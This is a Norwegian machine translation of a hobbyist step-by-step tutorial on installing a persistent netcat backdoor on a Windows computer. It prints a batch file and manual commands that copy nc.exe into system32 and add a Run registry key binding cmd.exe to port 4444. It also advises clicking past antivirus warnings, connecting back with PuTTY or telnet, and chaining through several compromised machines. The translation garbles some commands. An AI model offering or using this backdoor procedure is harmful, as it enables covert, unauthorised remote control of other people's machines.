Netcat Fun !: 5 trinn

2024 Forfatter: John Day | [email protected]. Sist endret: 2024-01-30 11:25

Denne instruksjonsfilen viser deg hvordan du lager en bakdør på en datamaskin med netcat! Jeg vil vise deg to måter å gjøre dette på, med og uten min batchfil som automatiserer den for deg. Denne instruksen antar allerede at du allerede har root -tillatelser på datamaskinen, sannsynligvis med en 0phcrack LiveCD her. Nå, til det instruerbare.

Trinn 1: Last ned Netcat

Jeg har spart deg for 3 minutter med å søke på Google og har lagt nc.exe på instrukser du kan laste ned. Alternativt kan du også laste ned nc.bat som er en batchfil jeg har opprettet for å automatisere prosessen for deg. Sørg for at hvis du laster ned nc.bat, er det 464 byte, fordi jeg fortsatte å laste opp versjoner og finne ut at noe var galt med det. Hvis det ikke er 464 byte, samsvarer ikke programmet med dette instruerbare.

Trinn 2: Med Nc.bat

Først må begge filene være i samme katalog for at nc.bat skal fungere skikkelig. Jeg foreslår at du bruker en flash-stasjon eller CD-ROM for denne operasjonen. Jeg brukte en 512 mb geek squad flash -stasjon for dette, men det er bare meg. Så kopier filene til den eksterne medieenheten, og ta dem med til datamaskinen du har root på. Gå på medieenheten og dobbeltklikk på nc.bat. Dette vil kopiere nc.exe -filen til system32 -mappen i systemroten (vanligvis C: / Windows eller C: / WINNT) og gjøre de nødvendige endringene i registret. Skriv deretter ned IP -adressen. Det vil være noe sånt som '192.168.1.103', som er mitt. Når dette er gjort, starter du maskinen på nytt og logger deg på. Da kan antivirusprogrammet spørre deg om du vil tillate/avvise programmet. Klikk på 'Tillat' eller lignende. Husk at i denne instruksen kan du bare telne inn fra det lokale nettverket til datamaskinen. Deretter går du av, eller logger deg av, eller hva du vil.

Trinn 3: Uten Nc.bat

For å gjøre dette må du ha nc.exe på en CD eller Flash -stasjon. Gå over til datamaskinen, logg inn, og koble til flash -stasjonen eller sett inn CD -en. Herfra er det to måter: De polerte grafiske brukergrensesnittene til vinduer eller den skitne, gammeldags måten med ledeteksten. og skriv inn:

cmd.exeNaviger deg til blitsen eller CD -stasjonen. Hvis du ikke vet hvilken stasjon som er, høyreklikker du på startknappen og klikker på Utforsk. Klikk på alle de ikke-lokale stasjonene i Min datamaskin til du kommer til flash-/CD-stasjonen. Husk bokstaven på stasjonen og gå tilbake til ledeteksten. Skriv inn bokstaven på stasjonen etterfulgt av et kolon, slik: K: Skriv deretter inn en linje om gangen, etterfulgt av å trykke på returtasten

kopier nc.exe%systemroot%\ system32 / nc.exereg legg til HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Det var ganske mye installasjonen. Alt du trenger å vite nå er den lokale IP -adressen, som du enkelt kan finne ved å skrive inn 'ipconfig' -kommandoen og lete etter noe i tabellen som "192.168.1.103". Start deretter maskinen på nytt og logg deg på igjen. Antivirusprogrammet kan spørre deg om du vil tillate/avvise. Klikk på Tillat. Deretter kan du gjøre det du vil med datamaskinen. De polerte grafiske grensesnittene i Windows Høyreklikk på startknappen og klikk på utforsk. Klikk på alle de ikke-lokale stasjonene i Min datamaskin til du kommer til flash-/CD-stasjonen. Høyreklikk deretter nc.exe og kopier. Gå deretter til C -stasjonen og klikk på Windows- eller WINNT -mappen. Gå deretter til system32 -mappen og lim inn nc.exe. Lukk det, og gå til StartRun. Skriv inn regedit. Naviger gjennom mappene til: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Høyreklikk deretter på et tomt mellomrom og gå til NewString Value. Skriv inn hva du vil for navnet, men skriv inn for verdien

%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exeDet var ganske mye installasjonen. Alt du trenger å vite nå er den lokale IP -adressen, som du enkelt kan finne ved å skrive inn 'ipconfig' -kommandoen i ledeteksten (StartRun: cmd.exe) og lete etter noe i tabellen som "192.168.1.103". Start deretter maskinen på nytt og logg deg på igjen. Antivirusprogrammet kan spørre deg om du vil tillate/avvise. Klikk på Tillat. Da står du fritt til å gjøre det du vil med datamaskinen.

Trinn 4: Gå tilbake

Når du har installert den, og du vil ta kontroll over verten, åpner du ledeteksten eller PuTTY. Jeg synes PuTTY er fantastisk, så jeg lar deg laste det ned her. Bruk PuTTY Last ned og åpne PuTTY.exe. Klikk på den "rå" protokollen. Skriv inn 4444 i tekstboksen port #. I "vertsadresse" -boksen skriver du inn IP -adressen du skrev ned under installasjonen. Trykk deretter enter. PuTTY bør koble seg til boksen, og du får en ledetekst. Bruke kommandoprompt Åpne ledeteksten og skriv inn 'telnet 4444'. Trykk deretter enter, og du bør få en ledetekst. Dette lar deg gjøre nesten alt du vil med datamaskinen eksternt som du kan gjøre med en lokal konto. Det begynner virkelig å bli interessant når du går inn på en datamaskin, og deretter går inn i en annen datamaskin fra den datamaskinen, for å få en hel datamaskinkjede koblet sammen. Ha det (lovlig) moro!

Trinn 5: Kildekode

Fordi jeg har blitt spurt, legger jeg opp kildekoden (for batchfilen) og forklarer hver kommando og hva den gjør. Vær oppmerksom! Dette er den nåværende versjonen av batchinstallasjonsprogrammet. Hvis din er annerledes, vil koden variere.

@echo offcopy nc.exe%systemroot%\ system32 / nc.exeif errorlevel 0 gå til regeditgoto feil: regeditreg legg til HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "hvis feilnivå 0 gå til ip: errorecho noe uventet har skjedd, og programmet må avslutte. gå til slutt: ipecho skriv ned IP -adressen fra tabellkonfigurasjonen: endecho end.echo duct tape out.pause@echo off-Forteller det å ikke vise kommandoene når du kjører.copy nc.exe %systemroot %\ system32 / nc.exe-kopierer vanligvis netcat til C: / WINDOWS / system32. Dette gjør det slik at når du går inn igjen, i stedet for å endre kataloger hele tiden, kan du bare skrive "nc" for å åpne en annen port.if errorlevel 0 gå til regedit-error-kontroll. Hvis kopien var vellykket, fortsetter den med å redigere registret. Gå til feil-Hvis det oppstod en feil, gå til: error label.:regedit-A label, angi at når programmet sier "goto regedit", gå her.reg legg til HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" -(skal være en linje) som legger til registernøkkelen for å starte programmet på nytt når det startes på nytt. /f betyr å overskrive eksisterende nøkkel, /v for nøkkelnavn, /d for data. Resten av taggene er input for netcat. -L sier at du skal starte den på nytt ved utgang, slik at du ikke trenger å vente på at datamaskinen skal starte på nytt. -d glemte jeg. -p 4444 spesifiserer port #. -det glemte jeg. -e cmd.exe gjør at ledeteksten starter på ekstern tilkobling. hvis feilnivå 0 går til ip-feilkontroll. Hvis kjøringen gikk galt, ville den hoppe over denne linjen og gå ned til: error label.echo noe uventet har skjedd, og programmet må avslutte.-Forteller programmet om å skrive ut "noe uventet har skjedd, og programmet må gå ut "på skjermen. gå til slutten-hvis det gikk til feilmeldingen, gikk noe galt, og programmet må lukkes uansett.: ip- Igjen, label.echo skriv ned IP-adressen fra tabellen-Skriver" skriv ned IP-en adresse fra tabellen "til screen.ipconfig-Dette er en kommando som skriver ut informasjon om lokalnettverket (LAN) -innstillinger.:end-Label.echo end.-skriver" end "til screen.echo duct tape ut. -skriver "duct tape out" til skjermen. pause-denne kommandoen stopper programmet midlertidig og venter på at brukeren trykker på en tast. I dette programmet venter det på input og avslutter deretter programmet.